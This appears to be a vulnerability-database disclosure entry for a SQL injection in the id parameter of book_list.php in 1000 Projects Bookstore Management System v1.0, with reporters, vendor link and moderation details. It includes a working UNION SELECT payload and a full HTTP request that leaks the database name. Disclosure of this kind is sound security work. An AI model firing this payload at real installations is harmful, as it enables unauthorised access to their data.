| Title | 1000 Projects Bookstore Management System v1.0 v1.0 SQL Injection |
|---|
| Description | A vulnerability classified as serious has been found in Bookstore Management System, which could affect unknown parts of the file book_list.php,Sql injection exists in the id parameter of the book_list.php file of Bookstore Management System v1.0
BUG_Author: 孙一航 广州大学,樊琦 广州大学
vendors: https://1000projects.org/bookstore-management-system-php-mysql-project.html
The program is built using the xmapp-php5.6 version
Vulnerability File: /bms/book_list.php?id=
Vulnerability location: /bms/book_list.php?id=, id
dbname =bms
[+] Payload: /bms/book_list.php?id=-17 union select 1,database(),3,4,5,6,7--+&cat=Web Design // Leak place ---> main_event_id
```sql
GET /bms/book_list.php?id=-17%20union%20select%201,database(),3,4,5,6,7--+&cat=Web%20Design HTTP/1.1
Host: 192.168.1.16
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7hpgkhvc3ujgkqtdko38g42if7
Connection: close
```
 |
|---|
| Source | ⚠️ https://github.com/Sy0ung-cmd/CVE/blob/main/vendors/1000projects/bookstore-management-system/SQLi-1.md |
|---|
| User | SunYihang (UID 77239) |
|---|
| Submission | 11/06/2024 05:35 (2 years ago) |
|---|
| Moderation | 11/07/2024 21:41 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 283462 [1000 Projects Bookstore Management System 1.0 /book_list.php ID sql injection] |
|---|
| Points | 20 |
|---|